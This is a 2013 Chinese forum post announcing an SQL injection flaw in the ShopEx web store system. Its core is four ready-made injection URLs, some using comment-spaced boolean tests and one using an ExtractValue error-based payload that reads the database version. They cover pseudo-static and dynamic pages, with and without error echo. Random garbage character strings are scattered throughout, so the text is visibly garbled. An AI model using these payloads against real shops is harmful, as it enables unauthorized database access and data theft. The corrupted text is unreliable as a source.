注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 4 h! [3 [( V) ]
4 B3 m, N5 Y, d好吧,我扯远了~~: i# N/ Y. i& V5 i
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
! [1 B b8 a, z不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 6 S: K& L, n$ r$ I0 N
; ]8 I5 R: {* b* }% b
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
. o8 o9 P& Y. s4 h
, F! S& o) |4 L% ]$ d! U4 f7 |1 Xhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
$ F' e$ i5 F( b! G
5 A: R: V! O/ O$ T( ]2 l' Nhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 6 V" ]' l3 b! t* r) a* b' J
" O- i3 R. f( R0 [% hhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
5 W. u6 ^; w, d% M9 D O( P+ B1 T& C$ l2 E' C" w/ g
( d+ s8 t; Y: u' u5 p+ y7 [
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。( [- N, x2 d9 W& }( x
如何注入就不多说了,10多年的东西了…不会也会了…
+ ], B2 t7 K! I; B, A" n6 i. z% i* l- B3 M3 I5 @
2 v0 H- E9 t: H$ J8 Y% l: N8 J6 Y) [) t1 h2 | C0 O
. K* Z7 g s( w: k4 f8 n" N* h |
发表于 2013-2-19 08:31:27
收藏
支持
反对